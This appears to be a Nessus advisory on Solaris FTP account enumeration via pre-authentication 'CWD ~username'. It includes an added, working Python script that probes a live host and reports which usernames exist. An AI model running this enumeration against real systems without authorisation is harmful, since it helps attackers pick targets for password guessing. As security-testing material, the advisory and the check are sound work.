Solaris FTP Daemon CWD Command Account Enumeration

medium Nessus Plugin ID 10653

Synopsis

The remote FTP server is susceptible to an account enumeration attack.

Description

It is possible to determine whether a given user account exists on the remote system by issuing the command CWD ~<username> before authenticating: the FTP server answers differently depending on whether the account exists, so no valid credentials are needed.
An attacker can exploit this flaw to confirm the presence of known vulnerable or default accounts before attempting to log in or guess passwords.
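The following Python script is an added example of the check described above; it is not part of the Nessus plugin or its NASL source. Instead of hard-coding one vendor's reply text, it first probes a random username that should not exist to obtain a baseline reply code, then flags any candidate whose pre-authentication CWD ~<name> reply code differs from that baseline. The function names, the constructed sample server and the two reply strings it returns (the ones reported for Solaris in.ftpd for this issue) are assumptions made for the example, not data taken from the plugin.

```python
"""Pre-authentication FTP account probe via ``CWD ~<username>``.

The finding is a reply difference: before any USER/PASS, ``CWD ~name`` for an
existing account is answered differently from ``CWD ~name`` for a non-existent
one. Rather than hard-coding one vendor's reply strings, the probe first
measures a baseline with a username that almost certainly does not exist and
then flags every candidate whose reply code differs from that baseline.
"""
import re
import secrets
import socket
import sys
from typing import Callable, Dict, Iterable, Tuple

# Final line of an FTP reply: three digits, a space, then free text (RFC 959).
REPLY_RE = re.compile(r"^(\d{3}) (.*)$")


def parse_reply(line: str) -> Tuple[int, str]:
    """Split '550 Unknown user name after ~' into (550, 'Unknown user name after ~')."""
    m = REPLY_RE.match(line.strip())
    if not m:
        raise ValueError(f"malformed FTP reply line: {line!r}")
    return int(m.group(1)), m.group(2)


def enumerate_users(send_cwd: Callable[[str], str],
                    candidates: Iterable[str]) -> Dict[str, bool]:
    """Return {username: True if the server's reply indicates the account exists}.

    ``send_cwd(name)`` must issue ``CWD ~name`` on an *unauthenticated* control
    connection and return the final reply line. A random baseline name is
    probed first; a server that does not leak answers every candidate with the
    baseline's code, so every result is False.
    """
    baseline_code, _ = parse_reply(send_cwd("nx" + secrets.token_hex(8)))
    results: Dict[str, bool] = {}
    for name in candidates:
        code, _ = parse_reply(send_cwd(name))
        results[name] = code != baseline_code
    return results


def make_live_sender(host: str, port: int = 21,
                     timeout: float = 10.0) -> Callable[[str], str]:
    """Open a control connection, consume the banner, return a send_cwd() for it."""
    sock = socket.create_connection((host, port), timeout=timeout)
    rfile = sock.makefile("rb")

    def read_reply() -> str:
        # Multi-line replies use 'NNN-' continuation lines; the reply ends at 'NNN '.
        while True:
            raw = rfile.readline()
            if not raw:
                raise ConnectionError("control connection closed by server")
            line = raw.decode("latin-1").rstrip("\r\n")
            if REPLY_RE.match(line):
                return line

    read_reply()  # 220 banner

    def send_cwd(name: str) -> str:
        sock.sendall(f"CWD ~{name}\r\n".encode("latin-1"))
        return read_reply()

    return send_cwd


# Constructed sample server (no real host involved). The two reply texts are
# the ones reported for Solaris in.ftpd for this issue; they are an assumption here.
CONSTRUCTED_ACCOUNTS = {"root", "bin", "operator"}


def constructed_vulnerable_send_cwd(name: str) -> str:
    """Leaky server: existing accounts get 530, unknown ones get 550."""
    if name in CONSTRUCTED_ACCOUNTS:
        return "530 Please login with USER and PASS."
    return "550 Unknown user name after ~"


def constructed_safe_send_cwd(name: str) -> str:
    """Non-leaky server: every pre-auth CWD gets the same answer."""
    return "530 Please login with USER and PASS."


if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit(f"usage: {sys.argv[0]} <host> <username> [<username> ...]")
    findings = enumerate_users(make_live_sender(sys.argv[1]), sys.argv[2:])
    for user, present in findings.items():
        print(f"{user}: {'exists' if present else 'no such account'}")
```

Run it against a lab host as `python3 ftp_cwd_enum.py <host> root bin nobody`. The baseline comparison matters: a server that answers every unauthenticated CWD with the same 530 reply produces no positives, so the script also serves as a quick regression check after a configuration change or patch.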

Solution

There is no known solution at this time.

Plugin Details

Severity: Medium

ID: 10653

File Name: ftp_sol_check_user.nasl

Version: 1.25

Type: remote

Family: FTP

Published: 4/16/2001

Updated: 1/16/2024

Supported Sensors: Nessus

Risk Information

CVSS Score Rationale: Score from a more in-depth analysis done by Tenable

CVSS v2

Risk Factor: Medium

Base Score: 5

Temporal Score: 4.3

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS Score Source: manual

CVSS v3

Risk Factor: Medium

Base Score: 5.3

Temporal Score: 4.9

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Temporal Vector: CVSS:3.0/E:U/RL:U/RC:C

Vulnerability Information

Exploit Available: true

Exploit Ease: No exploit is required

Vulnerability Publication Date: 4/11/2001

Reference Information

BID: 2564